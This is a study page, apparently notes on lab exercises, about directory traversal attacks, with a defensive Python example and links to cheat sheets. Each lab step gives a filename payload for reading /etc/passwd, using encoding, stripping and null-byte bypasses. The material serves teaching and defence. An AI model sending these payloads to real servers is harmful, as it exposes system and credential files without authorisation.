# Directory Traversal vulnerability

Directory traversal or Path Traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

**Difference between an absolute path and a relative path**

* Absolute path

  ```
    cd /home/kali/Desktop
  ```
* Relative path

  ```
    cd Desktop
  ```

**Example of a vulnerable endpoint**

<https://example.com/cms/login.php?language=en.html>

What happens if we change `en.html` to any other file?

***

## File path traversal, simple case

* Find this GET request in Burp Suite: `GET /image?filename=`
* Modify the `filename` parameter to the value: `../../../../etc/passwd`

***

## File path traversal, traversal sequences blocked with absolute path bypass

* Find this GET request in Burp Suite: `GET /image?filename=`
* Modify the `filename` parameter to the value: `/etc/passwd`

***

## File path traversal, traversal sequences stripped non-recursively

* Find this GET request in Burp Suite: `GET /image?filename=`
* Modify the `filename` parameter to the value: `..././..././..././..././..././etc/passwd`

***

## File path traversal, traversal sequences stripped with superfluous URL-decode

* Find this GET request in Burp Suite: `GET /image?filename=`
* Modify the `filename` parameter to the value: `..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd`

***

## File path traversal, validation of start of path

* Find this GET request in Burp Suite: `GET /image?filename=`
* Modify the `filename` parameter to the value: `/var/www/images/../../../etc/passwd`

***

## File path traversal, validation of file extension with null byte bypass

* Find this GET request in Burp Suite: `GET /image?filename=`
* Modify the `filename` parameter to the value: `../../../../etc/passwd%00.png`
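
A defender's view of the `filename` values from the sections above, as an added example that is not from the original page: `weak_resolve` is a hypothetical handler that strips `../` once and joins the result onto an image root, and `safe_resolve` is one way to harden it by canonicalising first and only then checking containment. The function names and `BASE` are assumptions for illustration.

```python
import os
from urllib.parse import unquote

BASE = "/var/www/images"  # assumed image root; this path appears in one of the page's payloads

# The filename values from the sections above.
PAYLOADS = [
    "../../../../etc/passwd",
    "/etc/passwd",
    "..././..././..././..././..././etc/passwd",
    "..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd",
    "/var/www/images/../../../etc/passwd",
    "../../../../etc/passwd%00.png",
]

def weak_resolve(name):
    """Flawed handler (hypothetical): strip '../' once, then join onto BASE."""
    stripped = name.replace("../", "")      # single pass: '..././' collapses to '../'
    return os.path.normpath(os.path.join(BASE, stripped))  # an absolute name discards BASE

def safe_resolve(name, base=BASE):
    """Decode until stable, reject NUL, canonicalise, then check containment."""
    prev = None
    while prev != name:                     # peel every layer of URL-encoding
        prev, name = name, unquote(name)
    if "\x00" in name:
        raise ValueError("NUL byte in filename")
    root = os.path.realpath(base)
    full = os.path.realpath(os.path.join(root, name))   # resolves '..' and symlinks
    if os.path.commonpath([root, full]) != root:
        raise ValueError("resolved path escapes base directory")
    return full                             # open exactly this path, not the raw input

def audit(payloads=PAYLOADS):
    """Return {payload: (weak_result, safe_result or 'rejected')}."""
    report = {}
    for p in payloads:
        try:
            safe = safe_resolve(p)
        except ValueError:
            safe = "rejected"
        report[p] = (weak_resolve(p), safe)
    return report

if __name__ == "__main__":
    for payload, (weak, safe) in audit().items():
        print(f"{payload!r}\n  weak: {weak}\n  safe: {safe}")
```

The `..././` value is not rejected by `safe_resolve`: without stripping, `...` is only an odd directory name, so the resolved path stays inside the base directory and the file is not found.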

***

## Cheat sheets for Path Traversal vulnerability

[PayloadsAllTheThings/Directory Traversal/Intruder/deep\_traversal.txt at master · swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/deep_traversal.txt)

[JahTheTrueGod/Directory-Traversal-Cheat-Sheet: Directory traversal refresher](https://github.com/JahTheTrueGod/Directory-Traversal-Cheat-Sheet)

[Directory Traversal Cheat Sheet – Penetration Testing Lab](https://pentestlab.blog/2012/06/29/directory-traversal-cheat-sheet/)

[Linux Path Traversal Cheatsheet](https://gist.github.com/SleepyLctl/63a2da730a3d5abce5013f0f510b1fe2)

